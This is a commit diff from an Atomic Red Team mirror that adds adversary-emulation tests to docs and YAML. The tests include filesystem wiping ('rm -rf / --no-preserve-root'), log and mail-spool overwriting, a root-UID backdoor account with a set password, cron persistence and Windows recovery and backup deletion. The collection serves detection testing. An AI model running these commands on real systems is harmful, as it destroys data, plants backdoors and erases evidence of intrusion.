security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2019-02-05 21:05:01 +00:00
parent 469372005c
commit 895c6f2d4f
8 changed files with 285 additions and 45 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1070/T1070.md
+40
View File
@@ -26,6 +26,10 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https://
- [Atomic Test #3 - rm -rf](#atomic-test-3---rm--rf)
- [Atomic Test #4 - Overwrite Linux Mail Spool](#atomic-test-4---overwrite-linux-mail-spool)
- [Atomic Test #5 - Overwrite Linux Log](#atomic-test-5---overwrite-linux-log)
<br/>
@@ -72,3 +76,39 @@ rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
```
<br/>
<br/>
## Atomic Test #4 - Overwrite Linux Mail Spool
This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of mail spool | String | root|
#### Run it with `bash`!
```
echo 0> /var/spool/mail/#{username}
```
<br/>
<br/>
## Atomic Test #5 - Overwrite Linux Log
This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_path | Path of specified log | Path | /var/log/secure|
#### Run it with `bash`!
```
echo 0> #{log_path}
```
<br/>
atomics/T1107/T1107.md
+17 -2
View File
@@ -28,6 +28,8 @@ There are tools available from the host operating system to perform cleanup, but
- [Atomic Test #11 - wbadmin](#atomic-test-11---wbadmin)
- [Atomic Test #12 - Delete Filesystem - Linux](#atomic-test-12---delete-filesystem---linux)
<br/>
@@ -184,7 +186,7 @@ wmic shadowcopy delete
<br/>
## Atomic Test #10 - bcdedit
xxx
This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
@@ -198,7 +200,7 @@ bcdedit /set {default} recoveryenabled no
<br/>
## Atomic Test #11 - wbadmin
xxx
This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
@@ -208,3 +210,16 @@ xxx
wbadmin delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #12 - Delete Filesystem - Linux
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux, CentOS, Ubuntu
#### Run it with `bash`!
```
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```
<br/>
atomics/T1136/T1136.md
+22
View File
@@ -14,6 +14,8 @@ The <code>net user</code> commands can be used to create a local or domain accou
- [Atomic Test #4 - Create a new user in PowerShell](#atomic-test-4---create-a-new-user-in-powershell)
- [Atomic Test #5 - Create a new user in Linux with `root` UID and GID.](#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid)
<br/>
@@ -95,3 +97,23 @@ New-LocalUser -Name #{username} -NoPassword
net user /add #{username}
```
<br/>
<br/>
## Atomic Test #5 - Create a new user in Linux with `root` UID and GID.
Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | butter|
| password | Password of the user to create | String | BetterWithButter|
#### Run it with `bash`!
```
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
```
<br/>
atomics/T1168/T1168.md
+31 -9
View File
@@ -18,15 +18,17 @@ Each launchd job is described by a different configuration property list (plist)
## Atomic Tests
- [Atomic Test #1 - Cron Job](#atomic-test-1---cron-job)
- [Atomic Test #1 - Cron - Replace crontab with referenced file](#atomic-test-1---cron---replace-crontab-with-referenced-file)
- [Atomic Test #2 - Cron Job](#atomic-test-2---cron-job)
- [Atomic Test #2 - Cron - Add script to cron folder](#atomic-test-2---cron---add-script-to-cron-folder)
- [Atomic Test #3 - Event Monitor Daemon Persistence](#atomic-test-3---event-monitor-daemon-persistence)
<br/>
## Atomic Test #1 - Cron Job
Set a cron job
## Atomic Test #1 - Cron - Replace crontab with referenced file
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
@@ -34,17 +36,37 @@ Set a cron job
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script | Script to execute | path | /tmp/evil.sh|
| command | Command to execute | string | /tmp/evil.sh|
| tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
#### Run it with `sh`!
#### Run it with `bash`!
```
echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
```
<br/>
<br/>
## Atomic Test #2 - Cron Job
Manually set a cron job
## Atomic Test #2 - Cron - Add script to cron folder
This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
| cron_script_name | Name of file to store in cron folder | string | persistevil|
#### Run it with `bash`!
```
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
```
<br/>
<br/>
## Atomic Test #3 - Event Monitor Daemon Persistence
This test adds persistence via a plist to execute via the macOS Event Monitor Daemon.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
atomics/index.md
+10 -4
View File
@@ -38,6 +38,7 @@
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -72,8 +73,9 @@
- [T1152 Launchctl](./T1152/T1152.md)
- Atomic Test #1: Launchctl [macos]
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- T1162 Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037 Logon Scripts](./T1037/T1037.md)
- Atomic Test #1: Logon Scripts [windows]
@@ -198,6 +200,7 @@
- Atomic Test #9: Delete VSS - wmic [windows]
- Atomic Test #10: bcdedit [windows]
- Atomic Test #11: wbadmin [windows]
- Atomic Test #12: Delete Filesystem - Linux [linux, centos, ubuntu]
- [T1222 File Permissions Modification](./T1222/T1222.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: Take ownership recursively using takeown utility [windows]
@@ -246,6 +249,8 @@
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: FSUtil [windows]
- Atomic Test #3: rm -rf [macos, linux]
- Atomic Test #4: Overwrite Linux Mail Spool [linux]
- Atomic Test #5: Overwrite Linux Log [linux]
- [T1202 Indirect Command Execution](./T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -541,8 +546,9 @@
- [T1152 Launchctl](./T1152/T1152.md)
- Atomic Test #1: Launchctl [macos]
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- [T1086 PowerShell](./T1086/T1086.md)
atomics/index.yaml
+149 -22
View File
@@ -1156,6 +1156,27 @@ persistence:
command: |
New-LocalUser -Name #{username} -NoPassword
net user /add #{username}
- name: Create a new user in Linux with `root` UID and GID.
description: 'Creates a new user in Linux and adds the user to the `root` group.
This technique was used by adversaries during the Butter attack campaign.
'
supported_platforms:
- linux
input_arguments:
username:
description: Username of the user to create
type: String
default: butter
password:
description: Password of the user to create
type: String
default: BetterWithButter
executor:
name: bash
command: |-
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
T1158:
technique:
id: attack-pattern--dc27c2ec-c5f9-4228-ba57-d67b590bda93
@@ -2125,8 +2146,10 @@ persistence:
created: '2017-12-14T16:46:06.044Z'
identifier: T1168
atomic_tests:
- name: Cron Job
description: 'Set a cron job
- name: Cron - Replace crontab with referenced file
description: 'This test replaces the current user''s crontab file with the contents
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
'
supported_platforms:
@@ -2135,17 +2158,23 @@ persistence:
- ubuntu
- linux
input_arguments:
script:
description: Script to execute
type: path
command:
description: Command to execute
type: string
default: "/tmp/evil.sh"
tmp_cron:
description: Temporary reference file to hold evil cron schedule
type: path
default: "/tmp/persistevil"
executor:
name: sh
command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
name: bash
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
'
- name: Cron Job
description: 'Manually set a cron job
- name: Cron - Add script to cron folder
description: 'This test adds a script to a cron folder configured to execute
on a schedule. This technique was used by the threat actor Rocke during the
exploitation of Linux web servers.
'
supported_platforms:
@@ -2153,6 +2182,28 @@ persistence:
- centos
- ubuntu
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
name: bash
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
'
- name: Event Monitor Daemon Persistence
description: "This test adds persistence via a plist to execute via the macOS
Event Monitor Daemon. \n"
supported_platforms:
- macos
- centos
- ubuntu
- linux
executor:
name: manual
steps: |
@@ -5354,7 +5405,7 @@ defense-evasion:
'
- name: bcdedit
description: 'xxx
description: 'This test leverages `bcdedit` to remove boot-time recovery measures.
'
supported_platforms:
@@ -5365,15 +5416,28 @@ defense-evasion:
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
description: 'xxx
'
description: "This test deletes Windows Backup catalogs. \n"
supported_platforms:
- windows
executor:
name: command_prompt
command: 'wbadmin delete catalog -quiet
'
- name: Delete Filesystem - Linux
description: 'This test deletes the entire root filesystem of a Linux system.
This technique was used by Amnesia IoT malware to avoid analysis. This test
is dangerous and destructive, do NOT use on production equipment.
'
supported_platforms:
- linux
- centos
- ubuntu
executor:
name: bash
command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
'
T1222:
technique:
@@ -6535,6 +6599,39 @@ defense-evasion:
command: |
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
- name: Overwrite Linux Mail Spool
description: 'This test overwrites the Linux mail spool of a specified user.
This technique was used by threat actor Rocke during the exploitation of Linux
web servers.
'
supported_platforms:
- linux
input_arguments:
username:
description: Username of mail spool
type: String
default: root
executor:
name: bash
command: 'echo 0> /var/spool/mail/#{username}
'
- name: Overwrite Linux Log
description: 'This test overwrites the specified log. This technique was used
by threat actor Rocke during the exploitation of Linux web servers.
'
supported_platforms:
- linux
input_arguments:
log_path:
description: Path of specified log
type: Path
default: "/var/log/secure"
executor:
name: bash
command: 'echo 0> #{log_path}'
T1202:
technique:
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
@@ -14998,8 +15095,10 @@ execution:
created: '2017-12-14T16:46:06.044Z'
identifier: T1168
atomic_tests:
- name: Cron Job
description: 'Set a cron job
- name: Cron - Replace crontab with referenced file
description: 'This test replaces the current user''s crontab file with the contents
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
'
supported_platforms:
@@ -15008,17 +15107,23 @@ execution:
- ubuntu
- linux
input_arguments:
script:
description: Script to execute
type: path
command:
description: Command to execute
type: string
default: "/tmp/evil.sh"
tmp_cron:
description: Temporary reference file to hold evil cron schedule
type: path
default: "/tmp/persistevil"
executor:
name: sh
command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
name: bash
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
'
- name: Cron Job
description: 'Manually set a cron job
- name: Cron - Add script to cron folder
description: 'This test adds a script to a cron folder configured to execute
on a schedule. This technique was used by the threat actor Rocke during the
exploitation of Linux web servers.
'
supported_platforms:
@@ -15026,6 +15131,28 @@ execution:
- centos
- ubuntu
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
name: bash
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
'
- name: Event Monitor Daemon Persistence
description: "This test adds persistence via a plist to execute via the macOS
Event Monitor Daemon. \n"
supported_platforms:
- macos
- centos
- ubuntu
- linux
executor:
name: manual
steps: |
atomics/linux-index.md
+10 -4
View File
@@ -10,6 +10,7 @@
- Atomic Test #3: Firefox [linux, windows, macos]
- [T1136 Create Account](./T1136/T1136.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #3: Hidden file [macos, linux]
@@ -17,8 +18,9 @@
- Atomic Test #10: Create hidden directories and files [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1166 Setuid and Setgid](./T1166/T1166.md)
@@ -153,6 +155,7 @@
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #12: Delete Filesystem - Linux [linux, centos, ubuntu]
- [T1222 File Permissions Modification](./T1222/T1222.md)
- Atomic Test #8: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #9: chmod - Change file or folder mode (symbolic mode) [macos, linux]
@@ -174,6 +177,8 @@
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070 Indicator Removal on Host](./T1070/T1070.md)
- Atomic Test #3: rm -rf [macos, linux]
- Atomic Test #4: Overwrite Linux Mail Spool [linux]
- Atomic Test #5: Overwrite Linux Log [linux]
- [T1130 Install Root Certificate](./T1130/T1130.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- [T1036 Masquerading](./T1036/T1036.md)
@@ -203,8 +208,9 @@
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- [T1064 Scripting](./T1064/T1064.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- [T1153 Source](./T1153/T1153.md)
atomics/macos-index.md
+6 -4
View File
@@ -28,8 +28,9 @@
- [T1152 Launchctl](./T1152/T1152.md)
- Atomic Test #1: Launchctl [macos]
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- T1162 Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037 Logon Scripts](./T1037/T1037.md)
- Atomic Test #2: Logon Scripts - Mac [macos]
@@ -105,8 +106,9 @@
- [T1152 Launchctl](./T1152/T1152.md)
- Atomic Test #1: Launchctl [macos]
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- [T1064 Scripting](./T1064/T1064.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- [T1153 Source](./T1153/T1153.md)